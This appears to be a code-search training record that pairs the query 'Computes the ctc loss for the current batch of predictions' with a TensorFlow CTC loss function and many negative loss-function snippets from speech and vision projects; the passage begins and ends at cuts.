"0.4882634", "0.48786837", "0.48769826", "0.487656", "0.4875768" ]
0.7509102
0
Computes the ctc loss for the current batch of predictions.
def ctc_loss(label_length, ctc_input_length, labels, probs):
    label_length = tf.cast(tf.squeeze(label_length), dtype=tf.int32)
    ctc_input_length = tf.cast(tf.squeeze(ctc_input_length), dtype=tf.int32)
    sparse_labels = tf.cast(tf.keras.backend.ctc_label_dense_to_sparse(labels, label_length), dtype=tf.int32)
    y_pred = tf.log(tf.transpose(probs, perm=[1, 0, 2]) + tf.keras.backend.epsilon())
    return tf.expand_dims(tf.nn.ctc_loss(labels=sparse_labels, inputs=y_pred, sequence_length=ctc_input_length), axis=1)
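A minimal usage sketch for the `ctc_loss` wrapper above. It assumes TensorFlow 1.x-style graph mode (via `tensorflow.compat.v1`), that the wrapper is defined in the same module, and made-up example shapes; every name and shape below is illustrative rather than taken from the dataset.

# Illustrative sketch only: TF1 graph mode, dummy shapes, `ctc_loss` from above assumed in scope.
import numpy as np
import tensorflow.compat.v1 as tf

tf.disable_v2_behavior()

batch_size, max_time, num_classes, max_label_len = 4, 50, 29, 10

probs = tf.placeholder(tf.float32, [batch_size, max_time, num_classes])   # softmax outputs per time step
labels = tf.placeholder(tf.int32, [batch_size, max_label_len])            # dense, zero-padded label ids
label_length = tf.placeholder(tf.int32, [batch_size, 1])                  # true label length per example
ctc_input_length = tf.placeholder(tf.int32, [batch_size, 1])              # valid time steps per example

per_example_loss = ctc_loss(label_length, ctc_input_length, labels, probs)  # shape [batch_size, 1]
mean_loss = tf.reduce_mean(per_example_loss)

with tf.Session() as sess:
    p = np.random.rand(batch_size, max_time, num_classes).astype(np.float32)
    p /= p.sum(axis=-1, keepdims=True)                                    # rows sum to 1, like softmax output
    feed = {
        probs: p,
        labels: np.random.randint(1, num_classes - 1, size=(batch_size, max_label_len)),
        label_length: np.full((batch_size, 1), max_label_len, dtype=np.int32),
        ctc_input_length: np.full((batch_size, 1), max_time, dtype=np.int32),
    }
    print(sess.run(mean_loss, feed_dict=feed))

Because the wrapper returns a `[batch_size, 1]` tensor (the `expand_dims` on its last line), the caller chooses the reduction; the sketch simply takes the mean.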
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_objectives(self, predictions, batch, stage):\n\n p_ctc, wav_lens = predictions\n\n ids = batch.id\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n tokens, tokens_lens = batch.tokens\n\n loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)\n\n if stage != sb.Stage.TRAIN:\n # Decode token terms to words\n sequence = sb.decoders.ctc_greedy_decode(\n p_ctc, wav_lens, blank_id=self.hparams.blank_index\n )\n\n predicted_words = self.tokenizer(sequence, task=\"decode_from_list\")\n\n # Convert indices to words\n target_words = undo_padding(tokens, tokens_lens)\n target_words = self.tokenizer(target_words, task=\"decode_from_list\")\n\n self.wer_metric.append(ids, predicted_words, target_words)\n self.cer_metric.append(ids, predicted_words, target_words)\n\n return loss", "def ctc_loss(input, target, padding_mask=-1, reduction='mean'):\n return FunctionLib.apply(\n 'CTCLoss', input.device, [input, target],\n padding_mask=padding_mask, reduction=reduction.upper())", "def ctc_loss(inputs, padding_mask=-1, **kwargs):\n args = ArgHelper.parse(locals())\n inputs[0] = activation_ops.softmax(inputs[0], axis=2)\n op_lib = loss_ops_lib.Operator\n if context.executing_eagerly():\n raise NotImplementedError\n else:\n return op_lib.blend('CTCLoss', **args)", "def _add_mxnet_ctc_loss(pred, seq_len, label):\n pred_ctc = mx.sym.Reshape(data=pred, shape=(-4, seq_len, -1, 0))\n\n loss = mx.sym.contrib.ctc_loss(data=pred_ctc, label=label)\n ctc_loss = mx.sym.MakeLoss(loss)\n\n softmax_class = mx.symbol.SoftmaxActivation(data=pred)\n softmax_loss = mx.sym.MakeLoss(softmax_class)\n softmax_loss = mx.sym.BlockGrad(softmax_loss)\n return mx.sym.Group([softmax_loss, ctc_loss])", "def compute_ctc_loss(self, logits, target):\n\n num_time_steps = logits.shape[0]\n num_labels = logits.shape[1] - 1\n num_labels_with_blank = num_labels + 1\n\n # sanity check to ensure targets are all right\n assert (target < num_labels).all()\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n target_length = 2 * target.shape[0] + 1\n\n normalized_logits = softmax(logits)\n alpha = self.compute_forward_variables(normalized_logits, target) \n \n return -np.log(np.sum(alpha[target_length-1, :] \\\n + alpha[target_length - 2, :], axis=0))", "def calculate_ctc_loss(label_length, ctc_input_length, labels, logits):\n ctc_input_length = tf.to_int32(ctc_input_length)\n sparse_labels = transfer2sparse(label_length, labels)\n return tf.reduce_mean(tf.nn.ctc_loss(labels=sparse_labels, inputs=logits, sequence_length=ctc_input_length))", "def _add_ctc_loss(pred, seq_len, num_label, loss_type):\n label = mx.sym.Variable('label')\n if loss_type == 'warpctc':\n print(\"Using WarpCTC Loss\")\n sm = _add_warp_ctc_loss(pred, seq_len, num_label, label)\n else:\n print(\"Using MXNet CTC Loss\")\n assert loss_type == 'ctc'\n sm = _add_mxnet_ctc_loss(pred, seq_len, label)\n return sm", "def compute_ctc_loss(criterion, ip, tgt, tgt_lens):\n ip_lens = torch.full(size=(ip.shape[1],), fill_value=ip.shape[0])\n return criterion(ip, tgt, ip_lens, tgt_lens)", "def compute_C_loss(data):\n c_pred = net(data[\"B\"])\n c_real = torch.argmax(data[\"B_class\"], dim=1)\n\n from torch.autograd import Variable\n loss = nn.CrossEntropyLoss()\n\n loss = loss(c_pred, c_real)\n loss = Variable(loss, requires_grad=True)\n return loss", "def ctc_loss(label_length: tf.Tensor, ctc_input_length: tf.Tensor, labels, logits: tf.Tensor):\n label_length = tf.to_int32(tf.squeeze(label_length))\n ctc_input_length = 
tf.to_int32(tf.squeeze(ctc_input_length))\n sparse_labels = tf.to_int32(tf.keras.backend.ctc_label_dense_to_sparse(labels, label_length))\n y_pred = tf.log(tf.transpose(logits, perm=[1, 0, 2]) + tf.keras.backend.epsilon())\n\n return tf.expand_dims(\n tf.nn.ctc_loss(labels=sparse_labels, inputs=y_pred, sequence_length=ctc_input_length),\n axis=1)", "def ctc_loss(data=None, label=None, data_lengths=None, label_lengths=None, use_data_lengths=_Null, use_label_lengths=_Null, blank_label=_Null, out=None, name=None, **kwargs):\n return (0,)", "def _add_warp_ctc_loss(pred, seq_len, num_label, label):\n label = mx.sym.Reshape(data=label, shape=(-1,))\n label = mx.sym.Cast(data=label, dtype='int32')\n return mx.sym.WarpCTC(data=pred, label=label, label_length=num_label, input_length=seq_len)", "def loss_calc(pred, label, device):\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\n label = Variable(label.long()).to(device)\n criterion = CrossEntropy2d().to(device)\n\n return criterion(pred, label)", "def replacement_ctc(self, model, target, output):\n\tif model.get_backend().get_name() == 'pytorch':\n\t\tpytest.xfail('Backend \"pytorch\" does not use a CTC loss function.')\n\treturn replacement_ctc.original(self, model, target, output)", "def calc_loss(self, outputs, labels):\n information_loss = self.bottleneck.buffer_capacity.mean() # Taking the mean is equivalent of scaling with 1/K\n cross_entropy = F.cross_entropy(outputs, target=labels)\n total = cross_entropy + self.beta * information_loss\n self.ce_loss.append(cross_entropy.cpu().detach().numpy())\n self.info_loss.append(information_loss.cpu().detach().numpy())\n self.total_loss.append(total.cpu().detach().numpy())\n return total", "def Loss(y,predict,isCE=False):\n if isCE:\n if dataMode == 0:\n return tf.losses.softmax_cross_entropy(y,predict)\n else:\n return tf.losses.softmax_cross_entropy(y[:,:,0],predict[:,:,0]) + tf.losses.softmax_cross_entropy(y[:,:,1],predict[:,:,1]) + tf.losses.softmax_cross_entropy(y[:,:,2],predict[:,:,2])\n else:\n return tf.reduce_mean(tf.square(y - predict))", "def loss_calc(pred, label, device):\r\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\r\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\r\n label = label.long().to(device)\r\n return cross_entropy_2d(pred, label)", "def compute_objectives(self, predictions, batch, stage):\n\n _, lens = batch.sig\n spkid, _ = batch.key_encoded\n\n # Concatenate labels (due to data augmentation)\n if stage == sb.Stage.TRAIN and hasattr(self.modules, \"env_corrupt\"):\n spkid = torch.cat([spkid, spkid], dim=0)\n lens = torch.cat([lens, lens])\n # Compute the cost function\n loss = sb.nnet.losses.bce_loss(predictions, spkid, lens)\n\n # Compute classification error at test time\n if stage != sb.Stage.TRAIN:\n self.error_metrics.append(batch.id, predictions, spkid, lens)\n return loss", "def ci_loss(preds, dtrain):\n # predictions: np.array with shape of (N, )\n n = preds.shape[0]\n y_hat = preds\n\n # labels: np.array with shape of (N, )\n labels = dtrain.get_label().astype('int')\n E = (labels > 0).astype('int')\n T = np.abs(labels)\n\n # Compute the term of concordance index approximation\n loss_num = .0\n loss_den = .0\n for i in np.arange(n):\n if E[i] > 0:\n w = y_hat[i] - y_hat[T[i] < T]\n # For part of denominator and numerator\n loss_den += np.sum(-w)\n loss_num += np.sum((w < _GAMMA) * (-w) * (_GAMMA - w)**2)\n \n loss = 0 if 
loss_den == 0 else loss_num / loss_den\n\n return \"ci_loss\", loss", "def CELOSS(output,label,delay = 0):\n if delay > 0:\n label.data[delay:,:] = label.data[0:-delay,:]\n label.data[0:delay, :] = -1\n _,predict = torch.max(output,1)\n correct = (predict.data == label.view(-1).data).sum()\n\n #correct = np.sum(predict_data == yt.reshape(-1))\n \n mask = (label>=0)\n output =F.log_softmax(output)\n labselect = label + (label<0).long()\n select = -torch.gather(output,1,labselect.view(-1,1))\n losses = mask.float().cuda().view(-1,1)*select\n loss = torch.sum(losses)/torch.sum(mask.float())\n return loss, correct", "def _compute_loss(self, batch: Dict[str, torch.Tensor]) -> torch.Tensor:\n\n feat_static_cat = batch[\"feat_static_cat\"]\n feat_static_real = batch[\"feat_static_real\"]\n past_time_feat = batch[\"past_time_feat\"]\n past_target = batch[\"past_target\"]\n future_time_feat = batch[\"future_time_feat\"]\n future_target = batch[\"future_target\"]\n past_observed_values = batch[\"past_observed_values\"]\n\n picnn = self.model.picnn\n\n _, scale, hidden_state, _, _ = self.model.unroll_lagged_rnn(\n feat_static_cat,\n feat_static_real,\n past_time_feat,\n past_target,\n past_observed_values,\n future_time_feat,\n future_target,\n )\n\n hidden_state = hidden_state[:, : self.model.context_length]\n\n distr = self.model.output_distribution(picnn, hidden_state, scale)\n\n context_target = past_target[:, -self.model.context_length + 1 :]\n target = torch.cat(\n (context_target, future_target),\n dim=1,\n )\n\n loss_values = self.loss(distr, target)\n\n return loss_values.mean()", "def loss(y_true, y_pred):\n ce = tf.keras.losses.categorical_crossentropy(y_true, y_pred, from_logits=True)\n l2_loss = l2_regularization_loss(model, weight_decay)\n return ce + l2_loss", "def loss(logits, labels, seq_lens):\n # Calculate the average ctc loss across the batch.\n ctc_loss = tf.nn.ctc_loss(inputs=tf.cast(logits, tf.float32),\n labels=labels, sequence_length=seq_lens)\n ctc_loss_mean = tf.reduce_mean(ctc_loss, name='ctc_loss')\n tf.add_to_collection('losses', ctc_loss_mean)\n\n # The total loss is defined as the cross entropy loss plus all\n # of the weight decay terms (L2 loss).\n return tf.add_n(tf.get_collection('losses'), name='total_loss')", "def compute_loss(self):\n self.test_logits = self.compute_logits()\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.data.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def custom_loss(y_true, y_pred):\n #print(K.int_shape(y_pred))\n sr = y_pred[:,:,:,0]\n sr_clear = y_pred[:,:,:,1]\n hr = y_true[:,:,:,0]\n hr_clear = y_true[:,:,:,1]\n dim = 384 #K.int_shape(y_pred)[1]\n diff = hr - sr\n denominateur = K.sum(hr_clear, axis=(1,2))\n\n b = K.sum( diff * hr_clear, axis=(1,2))/denominateur #batchsize dim\n #print(K.int_shape(y_pred), K.int_shape(y_pred[:,:,:]))\n b = K.expand_dims(b, axis=-1)\n b = K.expand_dims(b, axis=-1)\n b = K.repeat_elements(b, dim, axis=1 )\n b = K.repeat_elements(b, dim, axis=-1 )\n \n cMSE = K.sum(np.square( (diff-b)*hr_clear), axis=(1,2))/denominateur\n\n #cMSE = K.sum(np.square( (diff)*hr_clear), axis=(1,2))/denominateur\n cPSNR = -10*K.log(cMSE)/K.log(10.0)\n loss1 = 46.5 / cPSNR\n ce = binary_crossentropy(K.reshape(hr_clear, (-1, dim*dim)), K.reshape(sr_clear, (-1, dim*dim)))\n \n #print(K.int_shape(loss1), 
K.int_shape(ce))\n return loss1 + 0.5*ce", "def crossentropy_loss(y_true, y_pred):\n ce = tf.keras.losses.categorical_crossentropy(y_true, y_pred, from_logits=True) \n return ce", "def compute_objectives(self, predictions, batch, stage):\n (p_ctc, p_seq, asr_p_seq, mt_p_seq, wav_lens, hyps,) = predictions\n\n ids = batch.id\n\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n transcription_eos, transcription_eos_lens = batch.transcription_eos\n transcription_tokens, transcription_lens = batch.transcription_tokens\n\n # loss for different tasks\n # asr loss = ctc_weight * ctc loss + (1 - ctc_weight) * asr attention loss\n # mt loss = mt attention loss\n # st loss =\n # (1 - asr_weight - mt_weight) * st attention loss +\n # asr_weight * asr loss +\n # mt_weight * mt loss\n attention_loss = 0\n asr_ctc_loss = 0\n asr_attention_loss = 0\n mt_loss = 0\n\n # st attention loss\n attention_loss = self.hparams.seq_cost(\n p_seq, tokens_eos, length=tokens_eos_lens,\n )\n\n # asr attention loss\n if self.hparams.ctc_weight < 1 and self.hparams.asr_weight > 0:\n asr_attention_loss = self.hparams.seq_cost(\n asr_p_seq, transcription_eos, length=transcription_eos_lens,\n )\n\n # asr ctc loss\n if self.hparams.ctc_weight > 0 and self.hparams.asr_weight > 0:\n asr_ctc_loss = self.hparams.ctc_cost(\n p_ctc, transcription_tokens, wav_lens, transcription_lens,\n )\n\n # mt attention loss\n if self.hparams.mt_weight > 0:\n mt_loss = self.hparams.seq_cost(\n mt_p_seq, tokens_eos, length=tokens_eos_lens,\n )\n\n asr_loss = (self.hparams.ctc_weight * asr_ctc_loss) + (\n 1 - self.hparams.ctc_weight\n ) * asr_attention_loss\n loss = (\n (1 - self.hparams.asr_weight - self.hparams.mt_weight)\n * attention_loss\n + self.hparams.asr_weight * asr_loss\n + self.hparams.mt_weight * mt_loss\n )\n\n if stage != sb.Stage.TRAIN:\n current_epoch = self.hparams.epoch_counter.current\n valid_search_interval = self.hparams.valid_search_interval\n\n if stage == sb.Stage.TEST:\n # 4 references bleu score\n predictions = [\n en_detoeknizer.detokenize(\n hparams[\"tokenizer\"].decode_ids(utt_seq).split(\" \")\n )\n for utt_seq in hyps\n ]\n\n four_references = [\n batch.translation_0,\n batch.translation_1,\n batch.translation_2,\n batch.translation_3,\n ]\n\n targets = []\n for reference in four_references:\n detokenized_translation = [\n en_detoeknizer.detokenize(translation.split(\" \"))\n for translation in reference\n ]\n targets.append(detokenized_translation)\n\n self.bleu_metric.append(ids, predictions, targets)\n elif (\n current_epoch % valid_search_interval == 0\n and stage == sb.Stage.VALID\n ):\n predictions = [\n en_detoeknizer.detokenize(\n hparams[\"tokenizer\"].decode_ids(utt_seq).split(\" \")\n )\n for utt_seq in hyps\n ]\n\n targets = [\n en_detoeknizer.detokenize(translation.split(\" \"))\n for translation in batch.translation_0\n ]\n self.bleu_metric.append(ids, predictions, [targets])\n\n # compute the accuracy of the one-step-forward prediction\n self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)\n\n return loss", "def Weighted_Cross_Entropy(y_true, y_pred, eps = 1e-10):\n y_pred = tf.cast(y_pred, 'float64')\n y_true = tf.cast(y_true, 'float64')\n # deduce weights based on true pixel value\n class_weights = weights * y_true\n # compute your (unweighted) softmax cross entropy loss\n unweighted_losses = y_true*tf.math.log(y_pred + eps)\n ##print(unweighted_losses.dtype, weights.dtype)\n weighted_losses = unweighted_losses * class_weights\n # reduce the result to get your final loss\n loss = 
-tf.reduce_sum(weighted_losses)\n return loss", "def mse_loss1_rgb_col(y_true,y_pred):\n y_pred = tf_rgb2ycbcr(y_pred)/255.\n \n y_c_pred,cb_c_pred,cr_c_pred=tf.split(y_pred, 3 , axis=-1)\n y_c_true,cb_c_true,cr_c_true=tf.split(y_true, 3 , axis=-1) \n \n return ((tf.keras.losses.MSE(tf.expand_dims(cb_c_pred, axis=0),tf.expand_dims(cb_c_true, axis=0))) + (tf.keras.losses.MSE(tf.expand_dims(cr_c_pred, axis=0),tf.expand_dims(cr_c_true, axis=0))))", "def loss(y_true, y_pred):\r\n smooth = 1.\r\n skel_pred = soft_skel(y_pred, iter_)\r\n skel_true = soft_skel(y_true, iter_)\r\n pres = (K.sum(tf.math.multiply(skel_pred, y_true)[:,1:,:,:,:])+smooth)/(K.sum(skel_pred[:,1:,:,:,:])+smooth) \r\n rec = (K.sum(tf.math.multiply(skel_true, y_pred)[:,1:,:,:,:])+smooth)/(K.sum(skel_true[:,1:,:,:,:])+smooth) \r\n cl_dice = 1.- 2.0*(pres*rec)/(pres+rec)\r\n return cl_dice", "def loss_total(self, mask):\n\n def loss(y_true, y_pred):\n\n # Compute predicted image with non-hole pixels set to ground truth\n y_comp = mask * y_true + (1-mask) * y_pred\n\n # Compute the vgg features. \n if self.vgg_device:\n with tf.device(self.vgg_device):\n vgg_out = self.vgg(y_pred)\n vgg_gt = self.vgg(y_true)\n vgg_comp = self.vgg(y_comp)\n else:\n vgg_out = self.vgg(y_pred)\n vgg_gt = self.vgg(y_true)\n vgg_comp = self.vgg(y_comp)\n \n # Compute loss components\n l1 = self.loss_valid(mask, y_true, y_pred)\n l2 = self.loss_hole(mask, y_true, y_pred)\n l3 = self.loss_perceptual(vgg_out, vgg_gt, vgg_comp)\n l4 = self.loss_tv(mask, y_comp)\n l5 = - 0.5 * K.sum(1 + self.z_log_var -self.cl - K.square(self.z_mean)/K.exp(self.cl) - K.exp(self.z_log_var)/K.exp(self.cl))\n # Return loss function\n return l1 + 6*l2 + 0.05*l3 + 0.1*l4 +l5 \n return loss", "def add_loss_op(self, preds):\n ### YOUR CODE HERE (~2-4 lines)\n trans = tf.get_variable('trans',\n shape=[Config.n_classes, Config.n_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n log_likelihood, _ = crf_log_likelihood(preds,\n self.labels_placeholder,\n self.length_placeholder,\n trans)\n #log_likelihood = tf.boolean_mask(log_likelihood, self.mask_placeholder)\n loss = tf.reduce_mean(-1.0 * log_likelihood)\n \n ### END YOUR CODE\n return trans, loss", "def gen_criterion(dis_preds, ctc_loss):\n return ctc_loss - torch.mean(dis_preds)\n # return -torch.mean(dis_preds)", "def calculate_loss(self, outputs, teacher_predictions, labels=None):\n return self.loss(outputs,\n (teacher_predictions[:, :, :self.target_dim],\n teacher_predictions[:, :, self.target_dim:]))", "def crps_cost_function(y_true, y_pred, theano=False):\n\n # Split input\n mu = y_pred[:, 0]\n sigma = y_pred[:, 1]\n # Ugly workaround for different tensor allocation in keras and theano\n if not theano:\n y_true = y_true[:, 0] # Need to also get rid of axis 1 to match!\n\n # To stop sigma from becoming negative we first have to convert it the the variance and then take the square root again. \n var = K.square(sigma)\n # The following three variables are just for convenience\n loc = (y_true - mu) / K.sqrt(var)\n phi = 1.0 / np.sqrt(2.0 * np.pi) * K.exp(-K.square(loc) / 2.0)\n Phi = 0.5 * (1.0 + tf.math.erf(loc / np.sqrt(2.0)))\n # First we will compute the crps for each input/target pair\n crps = K.sqrt(var) * (loc * (2. * Phi - 1.) + 2 * phi - 1. / np.sqrt(np.pi))\n # Then we take the mean. 
The cost is now a scalar\n \n return K.mean(crps)", "def frcnn_cls_loss(*args):\n y_true, y_pred = args if len(args) == 2 else args[0]\n lf = tf.losses.CategoricalCrossentropy()\n return lf(y_true, y_pred)", "def call(self, y_true, y_pred):\n y_true = K.switch(tf.shape(y_true)[-1] == self.n_classes, y_true, tf.squeeze(tf.one_hot(tf.cast(y_true, tf.int32), self.n_classes)))\n selected_classes = tf.where(y_pred!=0, y_pred*(1/y_pred), y_pred)\n labels = tf.where(selected_classes==0, y_pred, y_true)\n loss = 0.5 * K.square(labels - y_pred)\n return loss * (1/self.batch_size) * (1/self.replicas)", "def cross_entropy_loss(batch_out, batch_gt):\r\n criterion = torch.nn.CrossEntropyLoss()\r\n target = torch.argmax(batch_gt, 1)\r\n loss = criterion(batch_out, target)\r\n\r\n return loss", "def compute_batch_loss(self, batch_data):\n loss = 0\n for data in batch_data:\n x, y = data\n x = x.view(-1,x.shape[0],x.shape[1])\n y = y.view(-1,y.shape[0], y.shape[1])\n loss += self.compute_loss(x.to(self.device), y.to(self.device))\n \n return loss", "def forward(self,pad_pred:torch.Tensor, pad_targets:torch.Tensor, ylen, ctc_out, hlens): # , ylen, encoder_output, hlens\n batch_size,maxlen,_ = pad_pred.size()\n self.loss = self.criterion(pad_pred.view(batch_size*maxlen,-1),pad_targets.view(-1))\n ppl = self.compute_perplexity(self.loss.item())\n self.loss *= (np.mean([ len(x[x!=self.ignore_label]) for x in pad_targets]) - 1)\n\n ## Try to add CTC loss.\n ylen_tensor = torch.LongTensor([length for length in ylen])\n hlens_tensor = torch.LongTensor([length for length in hlens])\n ctc_pad_targets = torch.clone(pad_targets)\n ctc_pad_targets[ctc_pad_targets==-1] = 0\n self.loss = 0.9 * self.loss + 0.1 * \\\n self.ctc(ctc_out.permute(1, 0, 2).log_softmax(-1), \n ctc_pad_targets, hlens_tensor, ylen_tensor)\n\n if self.training:\n return self.loss,self.compute_accuracy(pad_pred,pad_targets),None\n else:\n return self.loss,self.compute_accuracy(pad_pred,pad_targets),self.compute_wer(pad_pred,pad_targets)", "def loss_(self, batch):\n raise NotImplementedError", "def loss_softmax_cross_entropy(self, unet, predict, ground_truth):\n\n loss = -F.mean(F.log(predict+1e-16) * ground_truth)\n\n chainer.report({\"loss\":loss}, unet)#mistery\n return loss", "def loss_fn(y_true,y_pred): \n loss = tf.nn.softmax_cross_entropy_with_logits_v2(y_true,\n y_pred,\n axis=-1,\n )\n loss = tf.reduce_mean(loss,name=\"loss\")\n return loss", "def _compute_loss(self, predictions, targets, **params):\n pass", "def loss_fn(outputs, labels, wts):\n\n # reshape labels to give a flat vector of length batch_size*seq_len\n loss_noreduce = nn.BCEWithLogitsLoss(reduce=False)\n loss = torch.mean(loss_noreduce(outputs, labels)*wts)\n\t\n # compute cross entropy loss for all tokens\n return loss", "def get_loss(self, model, target, output):\n\t\tbackend = model.get_backend()\n\n\t\tif backend.get_name() == 'keras':\n\n\t\t\timport keras.backend as K\n\n\t\t\tif 'warp' in self.variant:\n\n\t\t\t\t# Just use the built-in Keras CTC loss function.\n\t\t\t\tlogger.info('Attaching Warp-CTC loss function to model '\n\t\t\t\t\t'output \"%s\".', target)\n\n\t\t\t\tif backend.get_toolchain() != 'theano':\n\t\t\t\t\tlogger.error('If you want to use warp-ctc, you need to '\n\t\t\t\t\t\t'use the Theano backend to Keras.')\n\t\t\t\t\traise ValueError('Warp-CTC is currently only supported '\n\t\t\t\t\t\t'with the Theano backend to Keras.')\n\n\t\t\telse:\n\t\t\t\t# Just use the built-in Keras CTC loss function.\n\t\t\t\tlogger.debug('Attaching built-in Keras CTC 
loss function to '\n\t\t\t\t\t'model output \"%s\".', target)\n\n\t\t\tctc_scaled = 'ctc_scaled_{}'.format(self.input_length)\n\t\t\tflattened_labels = 'ctc_flattened_labels_{}'.format(target)\n\n\t\t\ttranscript_length = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=self.output_length\n\t\t\t)\n\t\t\ttranscript = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\telse self.output\n\t\t\t)\n\t\t\tutterance_length = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=self.input_length if self.relative_to is None \\\n\t\t\t\t\telse ctc_scaled\n\t\t\t)\n\n\t\t\tif self.relative_to is not None:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tctc_scaled,\n\t\t\t\t\tScaledSource(\n\t\t\t\t\t\tmodel,\n\t\t\t\t\t\trelative_to=self.relative_to,\n\t\t\t\t\t\tto_this=target,\n\t\t\t\t\t\tscale_this=self.input_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\tif 'warp' in self.variant:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tflattened_labels,\n\t\t\t\t\tFlattenSource(\n\t\t\t\t\t\tself.output,\n\t\t\t\t\t\tself.output_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\t\ttry:\n\t\t\t\t\timport ctc\t\t\t\t\t# pylint: disable=import-error\n\t\t\t\texcept ImportError:\n\t\t\t\t\tlogger.error('The warp-CTC loss function was requested, '\n\t\t\t\t\t\t'but we cannot find the \"ctc\" library. See our '\n\t\t\t\t\t\t'troubleshooting page for helpful tips.')\n\t\t\t\t\traise ImportError('Cannot find the \"ctc\" library, which '\n\t\t\t\t\t\t'is needed when using the \"warp\" variant of the CTC '\n\t\t\t\t\t\t'loss function.')\n\n\t\t\t\tout = ctc.cpu_ctc_th(\n\t\t\t\t\toutput.dimshuffle((1, 0, 2)),\n\t\t\t\t\tK.squeeze(utterance_length, -1),\n\t\t\t\t\ttranscript[0]+1,\n\t\t\t\t\tK.squeeze(transcript_length, -1)\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tout = K.ctc_batch_cost(\n\t\t\t\t\ttranscript,\n\t\t\t\t\toutput,\n\t\t\t\t\tutterance_length,\n\t\t\t\t\ttranscript_length\n\t\t\t\t)\n\n\t\t\tif 'loss_scale' in self.variant:\n\t\t\t\tlogger.debug('Loss scaling is active.')\n\t\t\t\tout = out * K.mean(\n\t\t\t\t\tK.cast(utterance_length, K.dtype(out))\n\t\t\t\t) / 100\n\n\t\t\treturn (\n\t\t\t\t(\n\t\t\t\t\t(self.output_length, transcript_length),\n\t\t\t\t\t(flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\t\telse self.output, transcript),\n\t\t\t\t\t(self.input_length if self.relative_to is None \\\n\t\t\t\t\t\telse ctc_scaled, utterance_length)\n\t\t\t\t),\n\t\t\t\tout\n\t\t\t)\n\n\t\telif backend.get_name() == 'pytorch':\n\n\t\t\tif 'warp' not in self.variant:\n\t\t\t\tlogger.error('PyTorch does not include a native CTC loss '\n\t\t\t\t\t'function yet. However, PyTorch bindings to Warp CTC are '\n\t\t\t\t\t'available (SeanNaren/warp-ctc). 
Try installing that, and '\n\t\t\t\t\t'then settings variant=warp.')\n\t\t\t\traise ValueError('Only Warp CTC is supported for PyTorch '\n\t\t\t\t\t'right now.')\n\n\t\t\tctc_scaled = 'ctc_scaled_{}'.format(self.input_length)\n\t\t\tflattened_labels = 'ctc_flattened_labels_{}'.format(target)\n\t\t\ttranscript_length = model.data.placeholder(\n\t\t\t\tself.output_length,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\t\t\ttranscript = model.data.placeholder(\n\t\t\t\tflattened_labels,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\t\t\tutterance_length = model.data.placeholder(\n\t\t\t\tself.input_length if self.relative_to is None else ctc_scaled,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\n\t\t\tif self.relative_to is not None:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tctc_scaled,\n\t\t\t\t\tScaledSource(\n\t\t\t\t\t\tmodel,\n\t\t\t\t\t\trelative_to=self.relative_to,\n\t\t\t\t\t\tto_this=target,\n\t\t\t\t\t\tscale_this=self.input_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\tif 'warp' in self.variant:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tflattened_labels,\n\t\t\t\t\tFlattenSource(\n\t\t\t\t\t\tself.output,\n\t\t\t\t\t\tself.output_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\ttry:\n\t\t\t\tfrom warpctc_pytorch import CTCLoss\t# pytorch: disable=import-error\n\t\t\texcept ImportError:\n\t\t\t\tlogger.error('The warp-CTC loss function was requested, '\n\t\t\t\t\t'but we cannot find the \"warpctc_pytorch\" library. See '\n\t\t\t\t\t'out troubleshooting page for helpful tips.')\n\t\t\t\traise ImportError('Cannot find the \"warpctc_pytorch\" library, '\n\t\t\t\t\t'which is needed when using the \"warp\" variant of the CTC '\n\t\t\t\t\t'loss function.')\n\n\t\t\tloss = model.data.move(CTCLoss())\n\n\t\t\tdef basic_ctc_loss(inputs, output):\n\t\t\t\t\"\"\" Computes CTC loss.\n\t\t\t\t\"\"\"\n\t\t\t\treturn loss(\n\t\t\t\t\toutput.transpose(1, 0).contiguous(),\n\t\t\t\t\tinputs[0][0]+1,\t\t# transcript[0]+1\n\t\t\t\t\tinputs[1].squeeze(1),\t# K.squeeze(utterance_length, -1),\n\t\t\t\t\tinputs[2].squeeze(1)\t# K.squeeze(transcript_length, -1)\n\t\t\t\t) / output.size(0)\n\n\t\t\tif 'loss_scale' in self.variant:\n\t\t\t\tlogger.debug('Loss scaling is active.')\n\n\t\t\t\tdef loss_scale(inputs, output):\n\t\t\t\t\t\"\"\" Computes CTC loss.\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tfactor = inputs[1].float().mean().data[0] / 100.\n\t\t\t\t\treturn 